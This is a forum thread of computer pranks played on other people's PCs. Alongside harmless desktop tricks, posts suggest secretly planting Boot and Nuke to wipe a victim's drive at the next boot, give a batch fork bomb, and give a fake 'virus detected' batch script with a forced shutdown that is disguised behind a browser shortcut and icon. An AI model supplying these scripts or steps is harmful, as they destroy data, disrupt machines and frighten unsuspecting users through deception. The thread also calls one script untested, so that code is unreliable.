Make a bunch of empty folders on their desktop, and name them various hershey kisses related names. Then, take a screenshot and set it as the wallpaper. Then, disable desktop icons and hide the taskbar. Watch as they freak out trying to change/delete the folders, to no avail. Also, for optional lulz, set their screensaver to something hershey kisses-related too.
that is an awesome idea.
here's something fun. download a program called boot and nuke(destroys all files) and put it on a memcard. connect it inside somehow and set it to activate when the computer is booted next. that'll get lulz
Damn, good simple pranks. Something I'm not good at.
I've made programs which constantly send open commands to the CD ROM drive (which, in a certain class at school, the drive opens above the keyboard) - really makes it difficult to type with a drive over the keyboard...

lol .. i remember that proggy that opens the cd drive when u click the button with the
"click here for a free cupholder" label :D
now that was lulz

^ Probably should think about buying a new drive or something. DVD burners can be picked up here for like AU$35 last time I checked (about a year ago, so prices have probably gone down further).
for a lot of fun open a new notepad document and type-
@echo off

goto top
or
@echo off
:start
start fork.bat
GOTO start
(be careful with this ok)
save these files as .bat files and open them from where they were saved.
and here's a cool one-
@echo off
echo this is what you see on acid.....
pause
:top
color 1a
echo\
color 2a
echo \
color 3a
echo \

echo \

echo \

echo /
color 5a
echo /
color 4a
echo /
color 3a
echo /
color 2a
echo /
color 1a
echo /
goto top
anothe fun batch script:
Code:
@echo off
color 0a
cls
echo A virus has been detected
pause
echo Checking HDD, OK
pause
echo Checking RAM, OK
pause
echo ERROR ERROR ERROR ERROR ERROR ERRORE RROR ERROR ERROR ERROR ERROR ERROR
pause
echo Virus has now taken over [insert name of OS here]
pause
win shutdown -s -t -f -c

copy and paste the code into notepad, save it as a *.bat file, go to the desktop, find an icon for a program that's used regularly (e.g. internet explorer (anyone with firefox is most likely the kind of person who makes these pranks)), and edit the shortcut to point to the batch file changing the icon in the process to keep the internet explorer icon.
this should scare anyone who isn't the most computer savvy but anyone seasoned will see straight through it. i haven't actually tested this, i just made it up but it should work.
Lol is there anyway how this can brake my p.c.?
